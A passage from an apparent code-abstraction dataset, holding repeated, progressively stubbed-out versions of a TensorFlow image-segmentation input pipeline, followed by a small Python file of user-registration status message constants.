tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\ndef evaluate_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n return im_dec, im_filename, im_dec_raw\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\ndef _resize_images(image, label, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n la_res = tf.image.resize_images(label, [height, width], method=tf.image\n .ResizeMethod.NEAREST_NEIGHBOR)\n la_res = tf.squeeze(la_res, axis=2)\n im_res.set_shape([height, width, 3])\n la_res.set_shape([height, width])\n return im_res, la_res\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = 
dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\ndef evaluate_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n return im_dec, im_filename, im_dec_raw\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\ndef _resize_images(image, label, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n la_res = tf.image.resize_images(label, [height, width], method=tf.image\n .ResizeMethod.NEAREST_NEIGHBOR)\n la_res = tf.squeeze(la_res, axis=2)\n im_res.set_shape([height, width, 3])\n la_res.set_shape([height, width])\n return im_res, la_res\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = 
dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n return im_dec, im_filename, im_dec_raw\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\n<function token>\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef 
inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\n<function token>\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\n<function token>\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\n<function token>\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\n<function token>\n<function token>\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode_inference,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images_inference,\n height=params.height_input, width=params.width_input))\n dataset = dataset.batch(1)\n return dataset\n",
"<import token>\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n dataset = dataset.map(functools.partial(_parse_and_decode,\n dataset_directory=dataset_directory), num_parallel_calls=30)\n dataset = dataset.map(functools.partial(_resize_images, height=params.\n height_input, width=params.width_input))\n dataset = dataset.map(functools.partial(_preprocess_images, params=params))\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n return dataset\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n"
] | false |
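Editor's note: the row above abstracts a tf.data input pipeline that reads a file list with TextLineDataset, binds constant parameters (dataset directory, target size) into the map functions via functools.partial, and finishes with batch/shuffle/repeat. The sketch below shows that same pattern in a minimal, self-contained form; the file contents, the "images/" prefix, and the parse logic are illustrative assumptions, not part of the original pipeline, and it assumes a TensorFlow 2 eager environment.

# Minimal sketch of the functools.partial + tf.data pattern used by train_input/inference_input.
# File contents, directory prefix, and parse logic below are assumptions for illustration.
import functools
import tempfile

import tensorflow as tf

# Create a tiny stand-in "file list" so the example runs end to end.
tmp = tempfile.NamedTemporaryFile(mode="w", suffix=".txt", delete=False)
tmp.write("frankfurt_000000_000294\nmunster_000100_000019\n")
tmp.close()

def _parse_line(line, dataset_directory):
    # The dataset directory is a bound constant, mirroring
    # _parse_and_decode(filename, dataset_directory) in the row above.
    return tf.strings.join([dataset_directory, line, ".png"])

def make_input(filelist_path, dataset_directory, batch_size=1):
    dataset = tf.data.TextLineDataset(filelist_path)
    dataset = dataset.map(
        functools.partial(_parse_line, dataset_directory=dataset_directory),
        num_parallel_calls=2)
    return dataset.batch(batch_size)

for batch in make_input(tmp.name, "images/"):
    print(batch.numpy())   # e.g. [b'images/frankfurt_000000_000294.png']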
99,868 | cc84f2e1234aaa14adcd701460577c56d80556c0 | STR_REGISTRATION_SUCCESS = 'Registration successful'
STR_LOGIN_SUCCESS = 'Login successful'
STR_INVALID_EMAIL = 'Invalid email id provided'
STR_INVALID_MOBILE = 'Invalid mobile number provided'
STR_INVALID_GENDER = 'Invalid gender provided'
STR_FAMILY_ADDITION_SUCCESS = 'Family added successfully'
STR_RELATIONSHIP_ADDITION_SUCCESS = 'Relationship added successfully'
STR_RELATIVES_ADDITION_SUCCESS = 'Relatives added successfully'
STR_INVALID_PERSON = 'User information not available'
STR_INVALID_RELATIONSHIP = 'User information not available'
STR_SEARCH_SUCCESS = 'Search retrieved successfully'
STR_LOGIN_FAILED = 'Mobile number or password is invalid'
| [
"STR_REGISTRATION_SUCCESS = 'Registration successful'\n\nSTR_LOGIN_SUCCESS = 'Login successful'\n\nSTR_INVALID_EMAIL = 'Invalid email id provided'\nSTR_INVALID_MOBILE = 'Invalid mobile number provided'\nSTR_INVALID_GENDER = 'Invalid gender provided'\n\nSTR_FAMILY_ADDITION_SUCCESS = 'Family added successfully'\n\nSTR_RELATIONSHIP_ADDITION_SUCCESS = 'Relationship added successfully'\n\nSTR_RELATIVES_ADDITION_SUCCESS = 'Relatives added successfully'\n\n\nSTR_INVALID_PERSON = 'User information not available'\n\nSTR_INVALID_RELATIONSHIP = 'User information not available'\n\nSTR_SEARCH_SUCCESS = 'Search retrieved successfully'\n\nSTR_LOGIN_FAILED = 'Mobile number or password is invalid'\n",
